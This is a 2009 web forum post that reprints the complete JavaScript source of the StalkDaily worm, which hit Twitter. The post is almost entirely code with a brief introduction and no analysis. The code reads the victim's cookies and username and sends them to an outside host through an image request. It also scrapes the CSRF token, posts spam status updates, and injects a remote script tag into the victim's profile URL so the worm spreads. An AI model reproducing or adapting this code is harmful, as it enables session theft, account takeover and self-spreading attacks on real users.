Go Back   Web Design & SEO Company > Knowledgebase

Knowledgebase Articles and information about running a website, cPanel and various hints and tips. Here you will find tutorials on php, MySql, .htaccess, cron, SEO, Search Engines, CHMOD, FTP, CSS, HTML and various other hints and tips on running and Administrating a website.

Reply
 
  #1  
Old 04-12-2009, 01:34 PM
Admin's Avatar
Administrator
 
Join Date: Jan 2007
Location: Taree
Posts: 613
Default StalkDaily.com - Twitter XSS Exploit Code

Today Twitter was compromised with a worm that infected user profiles and spread rapidly through the service. Behind the attack was a website called StalkDaily.com (Do not visit this site). Anyhow here is the code used to exploit Twitter:


HTML Code:
function XHConn()
{
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
  };
  return this;
}
 
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    
    ret = encodeURIComponent(ret);
    
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;
}
 
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
 
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
 
function wait()
{
  var content = document.documentElement.innerHTML;
 
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  //alert(authtoken);
  
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
  randomUpdate[1]="Join www.StalkDaily.com everyone!";
  randomUpdate[2]="Woooo, www.StalkDaily.com :)";
  randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
  randomUpdate[4]="Wow...www.StalkDaily.com";
  randomUpdate[5]="@twitter www.StalkDaily.com";
  
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  
  updateEncode = urlencode(genRand);
  
  var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
  
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
Reply With Quote
Top SEO Tool
Harvester and Mass Blog Commenter
Blog Comment Software

Reply

Tools
Display Modes

Similar Threads
Thread Thread Starter Forum Replies Last Post
twitter followers raja1 SEO 0 07-02-2012 06:26 AM
Godaddy Promo Code for $7.48 .com Renwals and Registrations for July 2010 qna890 Domains For Sale 2 08-03-2010 03:21 AM
WebWatcher 50% 0ff Promo Code qna890 Domains For Sale 0 07-07-2010 08:20 PM
ixWebHosting 25% off discount code qna890 Domains For Sale 0 07-07-2010 12:27 AM
Twitter Following Webrecsol SEO 7 01-21-2010 09:34 AM
how to set a robo.txt file in our source code?? davin.master SEO 0 06-17-2009 12:26 PM



Knowledgebase | SEO | Free Scripts | Free Wordpress Themes | Free Graphics

eval gzinflate base64 decode | SEO Addons


Forum time zone is GMT. Currently it's 05:57 PM.

SEO - Top



Web Design & SEO Forums